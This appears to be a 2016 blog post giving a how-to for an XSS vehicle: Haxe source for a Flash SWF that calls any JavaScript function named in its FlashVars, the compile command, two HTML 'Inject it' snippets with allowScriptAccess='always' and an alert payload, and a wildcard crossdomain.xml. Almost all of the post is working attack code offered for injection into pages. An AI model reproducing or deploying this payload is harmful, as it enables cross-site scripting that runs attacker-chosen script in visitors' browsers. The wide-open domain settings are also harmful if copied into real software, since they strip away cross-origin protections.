Monday, January 4, 2016

create a simple flash using HAXE with (dynamic) javascript as parameter


Download and install HAXE
http://haxe.org/

Create the source file (xss.hx)
import flash.external.ExternalInterface;

class XSS {

public static function main() {

    flash.system.Security.allowDomain("*");
    flash.system.Security.allowInsecureDomain("*");

    var command:String = flash.Lib.current.loaderInfo.parameters.command;
    var param:String = flash.Lib.current.loaderInfo.parameters.param;

    ExternalInterface.call(command, param);
  }
}

Compile it
haxe XSS.hx -swf xss.swf -main XSS -swf-version 9

Inject it - 1
<head>
<body>

<object data="xss.swf">
   <param name="allowScriptAccess" value="always">
   <param name="FlashVars" value="command=alert&param=XSS%20SUCCESSFULL2">
</object>


</body>
</head>

Inject it - 2
<head>
<body>

<object>
 <embed
  FlashVars="command=alert&param=XSS%20SUCCESSFULL"
  src="xss.swf"
  allowScriptAccess="always"
 </embed>
</object>

</body>
</head>

Notice.
if you load the flash file from a other domain you need to set the crossdomain.xml

<?xml version="1.0" ?>
    <cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-policy>